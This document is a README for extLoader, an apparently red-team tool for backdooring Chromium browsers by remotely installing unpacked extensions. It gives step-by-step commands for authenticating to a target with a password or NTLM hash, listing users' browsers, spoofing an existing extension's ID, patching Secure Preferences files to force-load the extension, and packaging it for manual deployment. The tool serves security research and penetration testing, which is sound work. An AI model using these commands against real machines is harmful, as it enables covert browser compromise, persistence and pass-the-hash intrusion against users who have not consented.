extLoader

A small toolkit for managing and deploying unpacked Chromium extensions.

Find out more in the following blogpost: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installation

Direct install (pipx)

pipx install .
extloader --help

Use pipx for an isolated install targeting Python 3.10+.

Development setup (uv)

uv venv
source .venv/bin/activate
uv pip install -e .

Authentication Options

• Password: -p/--password
• Hash: -H/--hash (LM:NT format or just NT)
• Domain: -d/--domain (defaults to WORKGROUP)

Common Parameters

• -t, --target: Target IP/hostname
• -u, --username: Username
• -i, --index: User index from check command
• --debug: Enable debug logging

Usage

Here's a step-by-step example of deploying an extension:

1. First, check available targets:

# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

When running exploit on a different machine, always run the check command before to refresh the context (available_targets.json).

2. Prepare the manifest (sign or spoof an ID):

# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

To spoof an existing extension ID, skip the command above and set the manifest key to the base64 public key of the extension you are mimicking. Reusing that key keeps the CRX ID unchanged.

3. Deploy the extension:

# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(Alternative) Package for manual deployment:

# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file expects the browser profile preferences you backed up (Chrome/Edge store them as Secure Preferences, other Chromium browsers use Preferences). The loader copies it, patches it, and includes both the modified and untouched versions in the package.

├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json

5. Restore original preferences if needed:

# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

• Kerberos support
• nxc module
• Adapt package workflow for Linux
• Adapt package worflow for macOS